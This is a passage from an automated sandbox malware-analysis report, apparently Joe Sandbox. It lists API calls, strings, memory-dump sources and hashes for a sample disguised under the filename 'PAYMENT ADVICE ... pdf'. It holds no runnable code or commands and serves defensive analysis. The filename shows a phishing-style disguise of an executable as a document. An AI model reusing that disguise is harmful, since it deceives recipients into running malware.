                                                                                                                • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 00405748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Xxq$Xxq$Xxq$Xxq
                                                                                                                • API String ID: 0-3587233187
                                                                                                                • Opcode ID: 8cddb9020123deaf90097e23144138272435f4e73a4270e2359df843682c5b21
                                                                                                                • Instruction ID: bcd486d40d3fd818c3c19e9ac204110271340c9013df9c21a59304ca15294fe6
                                                                                                                • Opcode Fuzzy Hash: 8cddb9020123deaf90097e23144138272435f4e73a4270e2359df843682c5b21
                                                                                                                • Instruction Fuzzy Hash: 4031FC71D0435DDBDF668BA9884037EBBB6AF85311F1140A5CC65AB241EF70CD84CB92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \;tq$\;tq$\;tq$\;tq
                                                                                                                • API String ID: 0-1489472617
                                                                                                                • Opcode ID: a94ed5b9046b16a3a9aa66638999c154bfed810d064be75d107279222518672c
                                                                                                                • Instruction ID: 629cfb1c723e10d063beacd166ccdcfa8fe059acae9b1ef8e070f478e2009eb2
                                                                                                                • Opcode Fuzzy Hash: a94ed5b9046b16a3a9aa66638999c154bfed810d064be75d107279222518672c
                                                                                                                • Instruction Fuzzy Hash: A4018431710819CFCB258A2DC460A25B7E7AF887BA726416AEC29CF374DB35DC45C791
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9